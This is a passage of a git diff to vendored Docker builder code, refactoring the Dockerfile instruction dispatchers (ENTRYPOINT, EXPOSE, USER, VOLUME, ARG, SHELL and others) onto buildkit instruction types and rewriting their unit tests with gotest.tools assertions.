// -func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - - parsed := handleJSONArgs(args, attributes) - - switch { - case attributes["json"]: - // ENTRYPOINT ["echo", "hi"] - b.runConfig.Entrypoint = strslice.StrSlice(parsed) - case len(parsed) == 0: - // ENTRYPOINT [] - b.runConfig.Entrypoint = nil - default: - // ENTRYPOINT echo hi - b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0])) - } - - // when setting the entrypoint if a CMD was not explicitly set then - // set the command to nil - if !b.cmdSet { - b.runConfig.Cmd = nil - } - - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil { - return err +func dispatchEntrypoint(d dispatchRequest, c *instructions.EntrypointCommand) error { + runConfig := d.state.runConfig + cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem) + runConfig.Entrypoint = cmd + if !d.state.cmdSet { + runConfig.Cmd = nil } - return nil + return d.builder.commit(d.state, fmt.Sprintf("ENTRYPOINT %q", runConfig.Entrypoint)) } // EXPOSE 6667/tcp 7000/tcp // // Expose ports for links and port mappings. This all ends up in -// b.runConfig.ExposedPorts for runconfig. -// -func expose(b *Builder, args []string, attributes map[string]bool, original string) error { - portsTab := args - - if len(args) == 0 { - return errAtLeastOneArgument("EXPOSE") +// req.runConfig.ExposedPorts for runconfig. +// +func dispatchExpose(d dispatchRequest, c *instructions.ExposeCommand, envs []string) error { + // custom multi word expansion + // expose $FOO with FOO="80 443" is expanded as EXPOSE [80,443]. 
This is the only command supporting word to words expansion + // so the word processing has been de-generalized + ports := []string{} + for _, p := range c.Ports { + ps, err := d.shlex.ProcessWords(p, envs) + if err != nil { + return err + } + ports = append(ports, ps...) } + c.Ports = ports - if err := b.flags.Parse(); err != nil { + ps, _, err := nat.ParsePortSpecs(ports) + if err != nil { return err } - if b.runConfig.ExposedPorts == nil { - b.runConfig.ExposedPorts = make(nat.PortSet) + if d.state.runConfig.ExposedPorts == nil { + d.state.runConfig.ExposedPorts = make(nat.PortSet) } - - ports, _, err := nat.ParsePortSpecs(portsTab) - if err != nil { - return err + for p := range ps { + d.state.runConfig.ExposedPorts[p] = struct{}{} } - // instead of using ports directly, we build a list of ports and sort it so - // the order is consistent. This prevents cache burst where map ordering - // changes between builds - portList := make([]string, len(ports)) - var i int - for port := range ports { - if _, exists := b.runConfig.ExposedPorts[port]; !exists { - b.runConfig.ExposedPorts[port] = struct{}{} - } - portList[i] = string(port) - i++ - } - sort.Strings(portList) - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " "))) + return d.builder.commit(d.state, "EXPOSE "+strings.Join(c.Ports, " ")) } // USER foo @@ -658,164 +511,61 @@ func expose(b *Builder, args []string, attributes map[string]bool, original stri // Set the user to 'foo' for future commands and when running the // ENTRYPOINT/CMD at container run time. 
// -func user(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("USER") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - b.runConfig.User = args[0] - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args)) +func dispatchUser(d dispatchRequest, c *instructions.UserCommand) error { + d.state.runConfig.User = c.User + return d.builder.commit(d.state, fmt.Sprintf("USER %v", c.User)) } // VOLUME /foo // // Expose the volume /foo for use. Will also accept the JSON array form. // -func volume(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("VOLUME") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - if b.runConfig.Volumes == nil { - b.runConfig.Volumes = map[string]struct{}{} +func dispatchVolume(d dispatchRequest, c *instructions.VolumeCommand) error { + if d.state.runConfig.Volumes == nil { + d.state.runConfig.Volumes = map[string]struct{}{} } - for _, v := range args { - v = strings.TrimSpace(v) + for _, v := range c.Volumes { if v == "" { - return fmt.Errorf("VOLUME specified can not be an empty string") + return errors.New("VOLUME specified can not be an empty string") } - b.runConfig.Volumes[v] = struct{}{} - } - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil { - return err + d.state.runConfig.Volumes[v] = struct{}{} } - return nil + return d.builder.commit(d.state, fmt.Sprintf("VOLUME %v", c.Volumes)) } // STOPSIGNAL signal // // Set the signal that will be used to kill the container. 
-func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("STOPSIGNAL") - } +func dispatchStopSignal(d dispatchRequest, c *instructions.StopSignalCommand) error { - sig := args[0] - _, err := signal.ParseSignal(sig) + _, err := signal.ParseSignal(c.Signal) if err != nil { - return err + return errdefs.InvalidParameter(err) } - - b.runConfig.StopSignal = sig - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args)) + d.state.runConfig.StopSignal = c.Signal + return d.builder.commit(d.state, fmt.Sprintf("STOPSIGNAL %v", c.Signal)) } // ARG name[=value] // // Adds the variable foo to the trusted list of variables that can be passed -// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'. +// to builder using the --build-arg flag for expansion/substitution or passing to 'run'. // Dockerfile author may optionally set a default value of this variable. -func arg(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("ARG") - } - - var ( - name string - newValue string - hasDefault bool - ) - - arg := args[0] - // 'arg' can just be a name or name-value pair. Note that this is different - // from 'env' that handles the split of name and value at the parser level. - // The reason for doing it differently for 'arg' is that we support just - // defining an arg and not assign it a value (while 'env' always expects a - // name-value pair). If possible, it will be good to harmonize the two. - if strings.Contains(arg, "=") { - parts := strings.SplitN(arg, "=", 2) - if len(parts[0]) == 0 { - return errBlankCommandNames("ARG") - } - - name = parts[0] - newValue = parts[1] - hasDefault = true - } else { - name = arg - hasDefault = false - } - // add the arg to allowed list of build-time args from this step on. 
- b.allowedBuildArgs[name] = true +func dispatchArg(d dispatchRequest, c *instructions.ArgCommand) error { - // If there is a default value associated with this arg then add it to the - // b.buildArgs if one is not already passed to the builder. The args passed - // to builder override the default value of 'arg'. Note that a 'nil' for - // a value means that the user specified "--build-arg FOO" and "FOO" wasn't - // defined as an env var - and in that case we DO want to use the default - // value specified in the ARG cmd. - if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault { - b.options.BuildArgs[name] = &newValue + commitStr := "ARG " + c.Key + if c.Value != nil { + commitStr += "=" + *c.Value } - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg)) + d.state.buildArgs.AddArg(c.Key, c.Value) + return d.builder.commit(d.state, commitStr) } // SHELL powershell -command // // Set the non-default shell to use. -func shell(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - shellSlice := handleJSONArgs(args, attributes) - switch { - case len(shellSlice) == 0: - // SHELL [] - return errAtLeastOneArgument("SHELL") - case attributes["json"]: - // SHELL ["powershell", "-command"] - b.runConfig.Shell = strslice.StrSlice(shellSlice) - default: - // SHELL powershell -command - not JSON - return errNotJSON("SHELL", original) - } - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice)) -} - -func errAtLeastOneArgument(command string) error { - return fmt.Errorf("%s requires at least one argument", command) -} - -func errExactlyOneArgument(command string) error { - return fmt.Errorf("%s requires exactly one argument", command) -} - -func errAtLeastTwoArguments(command string) error { - return fmt.Errorf("%s requires at least two arguments", command) -} - -func errBlankCommandNames(command string) error { - return fmt.Errorf("%s 
names can not be blank", command) -} - -func errTooManyArguments(command string) error { - return fmt.Errorf("Bad input to %s, too many arguments", command) -} - -// getShell is a helper function which gets the right shell for prefixing the -// shell-form of RUN, ENTRYPOINT and CMD instructions -func getShell(c *container.Config) []string { - if 0 == len(c.Shell) { - return defaultShell[:] - } - return c.Shell[:] +func dispatchShell(d dispatchRequest, c *instructions.ShellCommand) error { + d.state.runConfig.Shell = c.Shell + return d.builder.commit(d.state, fmt.Sprintf("SHELL %v", d.state.runConfig.Shell)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go index f7c57f7e3b..36d20a1a82 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go @@ -1,517 +1,474 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "bytes" + "context" "runtime" - "strings" "testing" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/system" "github.com/docker/go-connections/nat" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -type commandWithFunction struct { - name string - function func(args []string) error +func newBuilderWithMockBackend() *Builder { + mockBackend := &MockBackend{} + ctx := context.Background() + b := &Builder{ + options: &types.ImageBuildOptions{Platform: runtime.GOOS}, + docker: mockBackend, + Stdout: new(bytes.Buffer), + clientCtx: ctx, + 
disableCommit: true, + imageSources: newImageSources(ctx, builderOptions{ + Options: &types.ImageBuildOptions{Platform: runtime.GOOS}, + Backend: mockBackend, + }), + imageProber: newImageProber(mockBackend, nil, false), + containerManager: newContainerManager(mockBackend), + } + return b } -func TestCommandsExactlyOneArgument(t *testing.T) { - commands := []commandWithFunction{ - {"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }}, - {"FROM", func(args []string) error { return from(nil, args, nil, "") }}, - {"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }}, - {"USER", func(args []string) error { return user(nil, args, nil, "") }}, - {"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errExactlyOneArgument(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) - } - } -} - -func TestCommandsAtLeastOneArgument(t *testing.T) { - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}, - {"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }}, - {"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }}, - {"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }}, - {"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errAtLeastOneArgument(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestEnv2Variables(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + envCommand := &instructions.EnvCommand{ + Env: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: "var1", Value: "val1"}, + instructions.KeyValuePair{Key: "var2", Value: "val2"}, + }, + } + err := dispatch(sb, envCommand) + assert.NilError(t, err) + + expected := []string{ + "var1=val1", + "var2=val2", + } + assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env)) } -func TestCommandsAtLeastTwoArguments(t *testing.T) { - commands := []commandWithFunction{ - {"ADD", func(args []string) error { return add(nil, args, nil, "") }}, - {"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{"arg1"}) - - if err == nil { - t.Fatalf("Error should be present for %s command", 
command.name) - } - - expectedError := errAtLeastTwoArguments(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestEnvValueWithExistingRunConfigEnv(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.runConfig.Env = []string{"var1=old", "var2=fromenv"} + envCommand := &instructions.EnvCommand{ + Env: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: "var1", Value: "val1"}, + }, + } + err := dispatch(sb, envCommand) + assert.NilError(t, err) + expected := []string{ + "var1=val1", + "var2=fromenv", + } + assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env)) } -func TestCommandsTooManyArguments(t *testing.T) { - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{"arg1", "arg2", "arg3"}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errTooManyArguments(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestMaintainer(t *testing.T) { + maintainerEntry := "Some Maintainer " + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.MaintainerCommand{Maintainer: maintainerEntry} + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(maintainerEntry, sb.state.maintainer)) } -func TestCommandseBlankNames(t *testing.T) { - bflags := &BFlags{} - config := &container.Config{} - - b := &Builder{flags: bflags, runConfig: config, disableCommit: true} +func TestLabel(t *testing.T) { + labelName := "label" + labelValue := "value" - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(b, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(b, args, nil, "") }}, + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.LabelCommand{ + Labels: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: labelName, Value: labelValue}, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - for _, command := range commands { - err := command.function([]string{"", ""}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errBlankCommandNames(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) - } - } + assert.Assert(t, is.Contains(sb.state.runConfig.Labels, labelName)) + assert.Check(t, is.Equal(sb.state.runConfig.Labels[labelName], labelValue)) } -func TestEnv2Variables(t *testing.T) { - variables := []string{"var1", "val1", "var2", "val2"} - - bflags := &BFlags{} - config := &container.Config{} - - b := &Builder{flags: bflags, runConfig: config, disableCommit: true} - - if err := env(b, variables, nil, ""); err != nil { - t.Fatalf("Error when executing env: %s", err.Error()) +func TestFromScratch(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.Stage{ + BaseName: "scratch", } + err := initializeStage(sb, cmd) - expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1]) - expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3]) - - if b.runConfig.Env[0] != expectedVar1 { - t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1) + if runtime.GOOS == "windows" && !system.LCOWSupported() { + assert.Check(t, is.Error(err, "Windows does not support FROM scratch")) + return } - if b.runConfig.Env[1] != expectedVar2 { - t.Fatalf("Wrong env output for second variable. 
Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2) - } + assert.NilError(t, err) + assert.Check(t, sb.state.hasFromImage()) + assert.Check(t, is.Equal("", sb.state.imageID)) + expected := "PATH=" + system.DefaultPathEnv(runtime.GOOS) + assert.Check(t, is.DeepEqual([]string{expected}, sb.state.runConfig.Env)) } -func TestMaintainer(t *testing.T) { - maintainerEntry := "Some Maintainer " - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} +func TestFromWithArg(t *testing.T) { + tag, expected := ":sometag", "expectedthisid" - if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil { - t.Fatalf("Error when executing maintainer: %s", err.Error()) + getImage := func(name string) (builder.Image, builder.ROLayer, error) { + assert.Check(t, is.Equal("alpine"+tag, name)) + return &mockImage{id: "expectedthisid"}, nil, nil } + b := newBuilderWithMockBackend() + b.docker.(*MockBackend).getImageFunc = getImage + args := NewBuildArgs(make(map[string]*string)) - if b.maintainer != maintainerEntry { - t.Fatalf("Maintainer in builder should be set to %s. 
Got: %s", maintainerEntry, b.maintainer) - } -} - -func TestLabel(t *testing.T) { - labelName := "label" - labelValue := "value" - - labelEntry := []string{labelName, labelValue} - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - if err := label(b, labelEntry, nil, ""); err != nil { - t.Fatalf("Error when executing label: %s", err.Error()) + val := "sometag" + metaArg := instructions.ArgCommand{ + Key: "THETAG", + Value: &val, } - - if val, ok := b.runConfig.Labels[labelName]; ok { - if val != labelValue { - t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val) - } - } else { - t.Fatalf("Label %s should be present but it is not", labelName) + cmd := &instructions.Stage{ + BaseName: "alpine:${THETAG}", } -} - -func TestFrom(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + err := processMetaArg(metaArg, shell.NewLex('\\'), args) - err := from(b, []string{"scratch"}, nil, "") + sb := newDispatchRequest(b, '\\', nil, args, newStagesBuildResults()) + assert.NilError(t, err) + err = initializeStage(sb, cmd) + assert.NilError(t, err) - if runtime.GOOS == "windows" { - if err == nil { - t.Fatalf("Error not set on Windows") - } + assert.Check(t, is.Equal(expected, sb.state.imageID)) + assert.Check(t, is.Equal(expected, sb.state.baseImage.ImageID())) + assert.Check(t, is.Len(sb.state.buildArgs.GetAllAllowed(), 0)) + assert.Check(t, is.Len(sb.state.buildArgs.GetAllMeta(), 1)) +} - expectedError := "Windows does not support FROM scratch" +func TestFromWithUndefinedArg(t *testing.T) { + tag, expected := "sometag", "expectedthisid" - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Error message not correct on Windows. 
Should be: %s, got: %s", expectedError, err.Error()) - } - } else { - if err != nil { - t.Fatalf("Error when executing from: %s", err.Error()) - } + getImage := func(name string) (builder.Image, builder.ROLayer, error) { + assert.Check(t, is.Equal("alpine", name)) + return &mockImage{id: "expectedthisid"}, nil, nil + } + b := newBuilderWithMockBackend() + b.docker.(*MockBackend).getImageFunc = getImage + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) - if b.image != "" { - t.Fatalf("Image shoule be empty, got: %s", b.image) - } + b.options.BuildArgs = map[string]*string{"THETAG": &tag} - if b.noBaseImage != true { - t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage) - } + cmd := &instructions.Stage{ + BaseName: "alpine${THETAG}", } + err := initializeStage(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(expected, sb.state.imageID)) } -func TestOnbuildIllegalTriggers(t *testing.T) { - triggers := []struct{ command, expectedError string }{ - {"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"}, - {"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"}, - {"FROM", "FROM isn't allowed as an ONBUILD trigger"}} - - for _, trigger := range triggers { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - err := onbuild(b, []string{trigger.command}, nil, "") - - if err == nil { - t.Fatalf("Error should not be nil") - } - - if !strings.Contains(err.Error(), trigger.expectedError) { - t.Fatalf("Error message not correct. 
Should be: %s, got: %s", trigger.expectedError, err.Error()) - } - } +func TestFromMultiStageWithNamedStage(t *testing.T) { + b := newBuilderWithMockBackend() + firstFrom := &instructions.Stage{BaseName: "someimg", Name: "base"} + secondFrom := &instructions.Stage{BaseName: "base"} + previousResults := newStagesBuildResults() + firstSB := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults) + secondSB := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults) + err := initializeStage(firstSB, firstFrom) + assert.NilError(t, err) + assert.Check(t, firstSB.state.hasFromImage()) + previousResults.indexed["base"] = firstSB.state.runConfig + previousResults.flat = append(previousResults.flat, firstSB.state.runConfig) + err = initializeStage(secondSB, secondFrom) + assert.NilError(t, err) + assert.Check(t, secondSB.state.hasFromImage()) } func TestOnbuild(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - expectedOnbuild := "ADD . /app/src" - - if b.runConfig.OnBuild[0] != expectedOnbuild { - t.Fatalf("Wrong ONBUILD command. Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0]) - } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.OnbuildCommand{ + Expression: "ADD . /app/src", + } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal("ADD . 
/app/src", sb.state.runConfig.OnBuild[0])) } func TestWorkdir(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} workingDir := "/app" - if runtime.GOOS == "windows" { - workingDir = "C:\app" - } - - err := workdir(b, []string{workingDir}, nil, "") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + workingDir = "C:\\app" } - - if b.runConfig.WorkingDir != workingDir { - t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir) + cmd := &instructions.WorkdirCommand{ + Path: workingDir, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(workingDir, sb.state.runConfig.WorkingDir)) } func TestCmd(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} command := "./executable" - err := cmd(b, []string{command}, nil, "") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + cmd := &instructions.CmdCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{command}, + PrependShell: true, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) var expectedCommand strslice.StrSlice - if runtime.GOOS == "windows" { expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command)) } else { expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command)) } - if !compareStrSlice(b.runConfig.Cmd, expectedCommand) { - t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd) - } - - if !b.cmdSet { - t.Fatalf("Command should be 
marked as set") - } -} - -func compareStrSlice(slice1, slice2 strslice.StrSlice) bool { - if len(slice1) != len(slice2) { - return false - } - - for i := range slice1 { - if slice1[i] != slice2[i] { - return false - } - } - - return true + assert.Check(t, is.DeepEqual(expectedCommand, sb.state.runConfig.Cmd)) + assert.Check(t, sb.state.cmdSet) } func TestHealthcheckNone(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.Healthcheck == nil { - t.Fatal("Healthcheck should be set, got nil") - } - - expectedTest := strslice.StrSlice(append([]string{"NONE"})) - - if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { - t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) - } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.HealthCheckCommand{ + Health: &container.HealthConfig{ + Test: []string{"NONE"}, + }, + } + err := dispatch(sb, cmd) + assert.NilError(t, err) + + assert.Assert(t, sb.state.runConfig.Healthcheck != nil) + assert.Check(t, is.DeepEqual([]string{"NONE"}, sb.state.runConfig.Healthcheck.Test)) } func TestHealthcheckCmd(t *testing.T) { - b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true} - - if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - if b.runConfig.Healthcheck == nil { - t.Fatal("Healthcheck should be set, got nil") + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + expectedTest := []string{"CMD-SHELL", "curl 
-f http://localhost/ || exit 1"} + cmd := &instructions.HealthCheckCommand{ + Health: &container.HealthConfig{ + Test: expectedTest, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1")) - - if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { - t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) - } + assert.Assert(t, sb.state.runConfig.Healthcheck != nil) + assert.Check(t, is.DeepEqual(expectedTest, sb.state.runConfig.Healthcheck.Test)) } func TestEntrypoint(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} entrypointCmd := "/usr/sbin/nginx" - if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.Entrypoint == nil { - t.Fatalf("Entrypoint should be set") + cmd := &instructions.EntrypointCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{entrypointCmd}, + PrependShell: true, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Assert(t, sb.state.runConfig.Entrypoint != nil) var expectedEntrypoint strslice.StrSlice - if runtime.GOOS == "windows" { expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd)) } else { expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd)) } - - if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) { - t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint) - } + assert.Check(t, is.DeepEqual(expectedEntrypoint, sb.state.runConfig.Entrypoint)) } func TestExpose(t 
*testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) exposedPort := "80" - - if err := expose(b, []string{exposedPort}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + cmd := &instructions.ExposeCommand{ + Ports: []string{exposedPort}, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - if b.runConfig.ExposedPorts == nil { - t.Fatalf("ExposedPorts should be set") - } - - if len(b.runConfig.ExposedPorts) != 1 { - t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts) - } + assert.Assert(t, sb.state.runConfig.ExposedPorts != nil) + assert.Assert(t, is.Len(sb.state.runConfig.ExposedPorts, 1)) portsMapping, err := nat.ParsePortSpec(exposedPort) - - if err != nil { - t.Fatalf("Error when parsing port spec: %s", err.Error()) - } - - if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok { - t.Fatalf("Port %s should be present. 
Got %s", exposedPort, b.runConfig.ExposedPorts) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(sb.state.runConfig.ExposedPorts, portsMapping[0].Port)) } func TestUser(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) - userCommand := "foo" - - if err := user(b, []string{userCommand}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.User != userCommand { - t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User) + cmd := &instructions.UserCommand{ + User: "test", } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal("test", sb.state.runConfig.User)) } func TestVolume(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) exposedVolume := "/foo" - if err := volume(b, []string{exposedVolume}, nil, ""); err != nil { - t.Fatalf("Error 